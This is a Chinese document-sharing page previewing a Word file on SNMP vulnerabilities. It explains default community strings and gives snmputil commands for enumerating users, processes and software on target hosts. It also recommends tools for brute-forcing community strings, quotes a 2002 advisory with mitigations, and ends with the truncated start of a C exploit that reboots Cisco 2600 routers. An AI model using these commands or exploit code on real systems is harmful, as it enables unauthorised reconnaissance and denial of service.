snmp协议漏洞分析.docx

上传人:b****6 文档编号:13050911 上传时间:2023-06-10 格式:DOCX 页数:16 大小:34.23KB
下载 相关 举报
snmp协议漏洞分析.docx_第1页
第1页 / 共16页
snmp协议漏洞分析.docx_第2页
第2页 / 共16页
snmp协议漏洞分析.docx_第3页
第3页 / 共16页
snmp协议漏洞分析.docx_第4页
第4页 / 共16页
snmp协议漏洞分析.docx_第5页
第5页 / 共16页
snmp协议漏洞分析.docx_第6页
第6页 / 共16页
snmp协议漏洞分析.docx_第7页
第7页 / 共16页
snmp协议漏洞分析.docx_第8页
第8页 / 共16页
snmp协议漏洞分析.docx_第9页
第9页 / 共16页
snmp协议漏洞分析.docx_第10页
第10页 / 共16页
snmp协议漏洞分析.docx_第11页
第11页 / 共16页
snmp协议漏洞分析.docx_第12页
第12页 / 共16页
snmp协议漏洞分析.docx_第13页
第13页 / 共16页
snmp协议漏洞分析.docx_第14页
第14页 / 共16页
snmp协议漏洞分析.docx_第15页
第15页 / 共16页
snmp协议漏洞分析.docx_第16页
第16页 / 共16页
亲,该文档总共16页,全部预览完了,如果喜欢就下载吧!
下载资源
资源描述

snmp协议漏洞分析.docx

《snmp协议漏洞分析.docx》由会员分享,可在线阅读,更多相关《snmp协议漏洞分析.docx(16页珍藏版)》请在冰点文库上搜索。

snmp协议漏洞分析.docx

snmp协议漏洞分析

、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、

、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、、

snmp简单网络管理协议漏洞分析

简单网络管理协议(SNMP)是一个

可以远程管理计算机和网络设备的协议.

有两种典型的远程监控模式.

他们可以粗略地分为"读"和"写"(或者是PUBLIC和PRIVATE).

如果攻击者能猜出一个PUBLIC团体串值,

那么他就可以从远程设备读取SNMP数据.

这个信息可能包括

系统时间,IP地址,接口,运行着的进程,etc等.

如果攻击者猜出一个PRIVATE团体串值

(写入或"完全控制"

他就有更改远程机器上信息的能力.

这会是一个极大的安全漏洞,

能让攻击者成功地破坏网络,运行的进程,ect.

其实,"完全控制"会给远程攻击者提供在主机上的完全管理权限.

更多信息请参见:

..._vulnerability.html

___________________________________________________________________

SNMPAgentrespondedasexpectedwithcommunityname:

public

CVE_ID:

CAN-1999-0517,CAN-1999-0186,CAN-1999-0254,CAN-1999-0516

BUGTRAQ_ID:

11237,10576,177,2112,6825,7081,7212,7317,9681,986

NESSUS_ID:

10264

Otherreferences:

IAVA:

2001-B-0001

SNMP服务在UDP161/162端口监听

用法:

snmputilwalkIPpublic[OID]

[----------OID-----------------------含义-------]

.1.3.6.1.2.1.25.4.2.1.2        获取系统进程

.1.3.6.1.4.1.77.1.2.25.1.1      获取用户列表

.1.3.6.1.4.1.77.1.4.1.0        获取域名

.1.3.6.1.2.1.25.6.3.1.2        获取安装的软件

.1.3.6.1.2.1.1              获取系统信息

--------------------------------------------------------------------

扫描到的一个报告:

.端口"snmp(161/udp)"发现安全漏洞:

  Snmp口令:

    "public"

.端口"snmp(161/udp)"发现安全提示:

      sysDescr.0=DraytekV3300AdvancedRouter

      sysUpTime.0=3Days,1Hours,53Minutes,10Seconds

      sysContact.0=admin@router

      sysName.0=V3300c

      sysLocation.0=HsinChu

      sysServices.0=0

目的:

得到远程目标的系统敏感信息

简单利用方法

这里的public使用来查询对方信息时所用到的密码

具体的做法:

要用到一个叫snmputil的东西,这个东西在win2000的resourcekit中有,通过它我们可以通过snmp服务来查看对方的一些信息

格式:

snmputilget(orwalkorgetnext)publicoid

get和括号里的时获取对方机器信息的一种方法,public就是查寻的时候要用的密码。

oid是被查询设备的ID号码

例如:

snmputilwalk111.111.111.111public.1.3.6.1.2.1.25.4.2.1.2

snmputilwalkippublic.1.3.6.1.2.1.25.4.2.1.2(列出系统进程)

snmputilwalkippublic.1.3.6.1.4.1.77.1.2.25.1.1(列出系统用户列表)

snmputilgetippublic.1.3.6.1.4.1.77.1.4.1.0(列出域名)

snmputilwalkippublic.1.3.6.1.2.1.25.6.3.1.2(列出安装软件)

snmputillwalkippublic.1.3.6.1.2.1(列出系统信息)

------------------------------------------------------------

关于扫描中snmp信息的利用

对于完全安装的WIN2K或者说启动了简单网络管理协议(SNMP)的系统来说,仍然将存在

非常致命的隐患,完全将你的系统暴露给所有人。

 

一、从SNMP说起

SNMP,SimpleNetworkManagementProtocol,简单网络管理协议。

用于管理IP网络上结点的协议。

几乎所有的网络设备和网络操作系统都支持SNMP。

接下来要介绍的是:

communitystrings,

理解成为基于SNMP协议信息通信时使用的一种“查询密码”应该不为过吧。

当使用特殊的客户端应用程序,通过该“查询密码”communitystrings的验证,将获得

对应的权限(只读或者读写)对SNMP中管理信息库(MIB)进行访问。

而管理信息库(MIB)中则保存了系统所有的重要信息。

也就是说,如果可以知道communitystrings这个“查询密码”,我们就可以刺探系统的信息了。

比较遗憾的是,很多网络设备厂商以及操作系统厂商,在初始状态下,都使用比较

统一的“查询密码”呵呵,这也就给我们提供了足够的方便。

 

二、对WIN2K进行刺探扫描

以WIN2K来说,一旦安装并启动了简单网络管理协议,系统将打开

UDP161snmp

UDP162snmptrap

两个端口。

具体做什么我们不去细究。

需要注意的是,这里使用的是UDP端口,而不是TCP端口。

同时,WIN2K系统支持初始的“查询密码”communitystrings为:

public

我们只要通过一款ResourceKit里面的工具snmputil,就可以方便的获得非常多的信息。

在这里可以下载:

...NEkm0m&hl=zh-CN

简单介绍一下用法

snmputil,就是程序名拉,呵呵。

get,就理解成获取一个信息。

getnext,就理解成获取下一个信息。

walk,就理解成获取一堆信息(嗯,应该说所有数据库子树/子目录的信息)

agent,具体某台机器拉。

community,嗯就是那个“communitystrings”“查询密码”拉。

oid,这个要多说一下,这个呢,就是物件识别代码(ObjectIdentifier)。

可以把oid理解成MIB管理信息库中各种信息分类存放树资源的一个数字标识。

尝试获得对方机器当前进程列表

snmputil.exewalk对方ippublic.1.3.6.1.2.1.25.4.2.1.2

尝试获得对方机器系统用户列表

snmputilwalk对方ippublic.1.3.6.1.4.1.77.1.2.25.1.1

整理一些列在下面:

snmputilwalk对方ippublic.1.3.6.1.2.1.25.4.2.1.2列出系统进程

snmputilwalk对方ippublic.1.3.6.1.4.1.77.1.2.25.1.1列系统用户列表

snmputilget对方ippublic.1.3.6.1.4.1.77.1.4.1.0列出域名

snmputilwalk对方ippublic.1.3.6.1.2.1.25.6.3.1.2列出安装的软件

snmputilwalk对方ippublic.1.3.6.1.2.1.1列出系统信息

 

三、一些工具的推荐

snmputil的功能已经完全足够用来进行对网络主机的刺探扫描了,只是因为它是命令行下的工具

而且,超常的oid标识符也并不是那么方便输入。

这里我推荐两款非常不错的网络管理工具,当然,它们的另一个作用就是snmp的刺探。

 

SolarWinds2001的IPNetworkBrowser

IPNetworkBrowser是一款snmp浏览工具,它可以提供在输入正确的communitystrings“查询密码”

后的运行着snmp服务的WIN2K/NT系统上的任何可得的信息。

在下图中,我们可以看到“查询密码”为:

public

而在Accounts(账号)表单里,我们已经获得了同上面snmputil命令行方式一样的反馈信息。

功能强大噢。

整个SolarWinds软件套件更包含了更多的网络管理工具,以后我将在其他的文章里继续介绍。

 

LANguardNetworkScanner2.0

这是一个网络安全综合扫描工具,主要功能:

显示每台主机的NETBIOS主机名,MAC地址,搜寻

共享,操作系统类型判断,并测试共享密码的安全性等等,以html格式输出。

当然,LANguardNetworkScanner还有一些更高级更适用的功能

比如暴力破解communitystrings,呵呵自己配置一个字典的话

会非常有效的。

 

四、如何防范基于snmp的刺探扫描

首先需要注意的是,snmp服务的通讯端口是UDP端口,这也就是大部分网络管理人员很容易忽略的地方。

往往某些网管配置服务器阻断了NetBIOS空会话的建立,就认为系统安全有了相当的保障,可由于安装

了SNMP服务,不知不觉中,就给系统带去了极大的隐患。

最方便和容易的解决方法,就是关闭SNMP服务,或者卸载掉该服务。

如果关掉SNMP服务不方便的话,那么可以通过修改注册表或者直接修改图形界面的SNMP服务属性

进行安全配置。

开始——程序——管理工具——服务——SNMPService——属性——安全

在这个配置界面中,可以修改communitystrings,也就是微软所说的“团体名称”,呵呵,也就是

我所说的“查询密码”。

或者可以配置是否从某些安全主机上才允许SNMP查询。

不过NT4环境下的朋友就必须修改注册表了。

修改communitystrings,在

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ValidCommunities]

下,将public的名称修改成其它的名称就可以了。

如果要限定允许的ip才可以进行SNMP查询,可以进入

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\PermittedManagers]

添加字符串,名称为“1”,内容为要允许的主机IP。

当然,如果允许多台机器的话,就要名称沿用“2、3、4”等名称了。

-----------------------------------------------------------------

附带资料:

SNMP协议实现存在多个漏洞

--------------------------------------------------------------------------------

来源:

  类别:

系统漏洞  日期:

2002-6-228:

08:

04

涉及程序:

SNMP协议和各种网络设备

描述:

snmp协议实现机制存在多个漏洞严重危害互联网基础安全

详细:

背景:

ASNNo.1信令为抽象数据类型形式的标准,1984年以来,被用于编写和发送复杂的数据结构。

这个语言从80年代开始衍生出了多个通信协议和应用,是电信业、电力业和核电业计算机网络基础信令。

也是互联网赖以运行的基础通信规则之一。

全球级计算机安全专家正在调查ASNN0.1信令的安全脆弱性。

这些脆弱性严重威胁互联网基础设施安全,黑客可以开发攻击程序,关闭ISP的骨干路由器、交换机和众多的基础网络设备。

最终破坏性的后果将是引起互联网瘫痪。

业界和政府的计算机安全专家门早就在关注这些问题。

CNNS的安全专家早在1999年就发现很多电信公司的骨干路由器有致命缺陷。

在那个时候,只需要很简单的操作,就可以引起大规模的网络瘫痪。

举一个例子,一个显著的漏洞特征曾经出现在台湾中华电信,1999年如果有黑客施之以简单攻击,整个台湾地区大约65%的用户就不再能上网。

由于ASNNo.1信令的安全脆弱性,超过100家计算机网络设备的提供商将付出代价。

弥补这些缺陷的投入将超过1亿美金。

数百家网络设备提供商在今年早期就获得警告。

如今已经纷纷给出解决方案。

由于多个internet通信协议都是基于ASNNo.1计算机网络语言,ASNNo.1的脆弱性将广泛威胁通信行业。

最为显著的例子就是造成SNMP协议多个安全漏洞。

相同的问题还影响至少其它三个互联网协议,在这里不做详细叙述。

OuluUniversitySecureProgrammingGroup(OUSPG,)长期专注于SNMP协议的研究,并披露了这个严重的安全系列问题。

=========================================================================================

多个计算机网络设备厂商的产品存在由于snmp协议脆弱性引起的多个漏洞,这些缺陷可能允许非法越权访问、拒绝服务攻击、导致不稳定的运行状况。

SimpleNetworkManagementProtocol(SNMP)协议被广泛用于网络设备的监控和管理。

SNMPv1定义了多个类型的SNMP讯息,如请求信息、配置改变、请求响应、SNMP对象列举,和主动的警报发送。

一、SNMPv1跟踪消息处理系列缺陷

SNMP代理(SNMPagents)发送跟踪消息(SNMPtrapmessages)到管理器(SNMPmanager),向管理器报告错误信息、警报和其它的有关宿主的状态

信息。

管理器必须解析和处理这些数据。

OUSPG发现很多SNMP管理器在解析和处理过程中存在缺陷。

二、SNMPv1请求信息处理系列缺陷

SNMP请求信息是从管理器向snmpagent代理发出的。

请求信息用于获取代理信息或指示snmpagent配置设备参数。

SNMPagent代理必须正确解码和处理该信息。

在解码以及随后的数据处理过程中,代理和管理器都有出现拒绝服务错误、格式化字符串错误和缓冲溢出攻击的可能。

有的攻击甚至不需要提供正确的SNMPcommunitystring(SNMP协议设置的一个关键参数,有点类似口令)。

这些漏洞可以导致拒绝服务、服务中断,还有一些情况下可以允许攻击者获取设备的非法访问权限。

攻击对于不同的产品有不同的影响。

解决方案:

本站列出了一百多个全球大厂商关于这个安全问题的响应和有关信息:

请注意,以下的安全措施对于您的网络日常维护和网络设置构架可能有重大的影响。

要确保以下措施的结果不会影响网络运行性能。

1、从厂商获得补丁程序并执行

提供了厂商有关该安全性问题的信息。

2、禁止SNMP服务

CNNS建议您禁止所有不必要运行的服务,包括SNMP。

不幸的是,有些产品在SNMP服务被禁止的情况下会有意外情况发生或者拒绝服务。

如果是这样的话,必须执行更高级的安全设置。

3、边界访问过滤

临时的措施是,在网络边界禁止不良信息流进入内部网络或者发往外部网络。

对于网络管理者来说,比较有力的措施是通过防火墙等过滤设备控制对SNMP服务的请求。

比如,除指定的服务器外,缺省情况下通通禁止对SNMP服务的请求,以下端口的过滤有利于外部攻击者对内部网的SNMP攻击:

snmp161/udp#SimpleNetworkManagementProtocol(SNMP)

snmp162/udp#SNMPsystemmanagementmessages

以下这些服务并不常用,但有些产品可能运行这些服务:

snmp161/tcp#SimpleNetworkManagementProtocol(SNMP)

snmp162/tcp#SNMPsystemmanagementmessages

smux199/tcp#SNMPUnixMultiplexer

smux199/udp#SNMPUnixMultiplexer

synoptics-relay391/tcp#SynOpticsSNMPRelayPort

synoptics-relay391/udp#SynOpticsSNMPRelayPort

agentx705/tcp#AgentX

snmp-tcp-port1993/tcp#ciscoSNMPTCPport

snmp-tcp-port1993/udp#ciscoSNMPTCPport

过滤对这些服务的请求,必须细心慎重,以免影响正常的网络运行。

值得注意的是,SNMP守护进程可能在该设备上绑定所有的IP地址。

因此,要合理考虑包过滤策略。

比如,即使禁止了SNMP包直接发送给普通的网络地址,还是有可能受到攻击。

因为攻击者可以利用SNMP缺陷攻击一些特殊的网络地址,如:

网络广播地址

子网广播地址

和所有的loopback地址。

(127.x.x.x)loopback地址常被路由器用于管理用途。

管理员可以考虑是否过滤这些数据包。

但必须慎重,因为不当的设置可能影响网络性能。

最后,对以下的RPC服务的访问也可以考虑禁止:

名称程序ID别名

snmp100122na.snmpsnmp-cmcsnmp-synopticssnmp-unisyssnmp-utk

snmpv2100138na.snmpv2#SNMVersion2.2.2

snmpXdmid100249

值得注意的是,这些措施对内部攻击无效。

4、在内部网络中过滤不正常的SNMP访问。

在很多网络系统中,只有有限的网络管理系统需要发生SNMP请求。

基于这种情形,对于大多数的SNMP代理,可以设置仅接受有限几台主机的SNMP请求。

这样可以降低内部攻击风险。

使用这些安全措施同样必须慎重,以免不当的设置降低网络性能。

5、修改缺省的"communitystring"

很多支持SNMP服务的产品的出厂设置中,默认的community-string是"public"(只读访问)和"private"(读写访问)。

CNNS强烈建议用户修改这两个缺省字符串。

否则攻击者将可以通过SNMP协议修改设备的设定。

修改了这两个缺省"口令"后,还要防备监听攻击以免攻击者获得新的设置"口令"。

SNMPv3对这点做了改进,参考RFC2574。

6、隔离SNMP包

从网络管理的角度,用隔离措施可以降低SNMP攻击的风险。

包括物理隔离、VLAN逻辑隔离和VPN方式的隔离。

注意通过交换机做VLAN隔离将加大攻击者攻击难度,但理论上并不能完全杜绝这类攻击。

------------------------------------------------------

攻击方法:

范例:

一、如果获取支持SNMP协议设备的"communitystring",在合适的环境下,攻击者将可以:

1、修改路由器配置

2、获取服务器最高控制权

3、重新启动设备

二、攻击者在不知道"communitystring"的前提下,也能进行拒绝服务攻击。

以下这段代码将重启Cisco2600路由器:

/*Thisprogramsendaspoofedsnmpv1getrequestthatcausesystemreboot

onCisco2600routerswithIOSversion12.0(10)

Author:

...don'tbelameusefortestingonly!

..

*/

#include

#include

#include

#include

#include

#include

#include

#include

#include

structin_addrsourceip_addr;

structin_addrdestip_addr;

structsockaddr_indest;

structip*IP;

structudphdr*UDP;

intp_number=1,sok,datasize,i=0;

char*packet,*source,*target;

char*packetck;

char*data,c;

charsnmpkill[]=

"\x30\x81\xaf\x02\x01\x00\x04\x06\x70\x75\x62\x6c\x69\x63\xa0\x81"

"\xa1\x02\x02\x09\x28\x02\x01\x00\x02\x01\x00\x30\x81\x94\x30\x81"

"\x91\x06\x81\x8c\x4d\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"

"\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"

"\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"

"\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"

"\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 高等教育 > 历史学

copyright@ 2008-2023 冰点文库 网站版权所有

经营许可证编号:鄂ICP备19020893号-2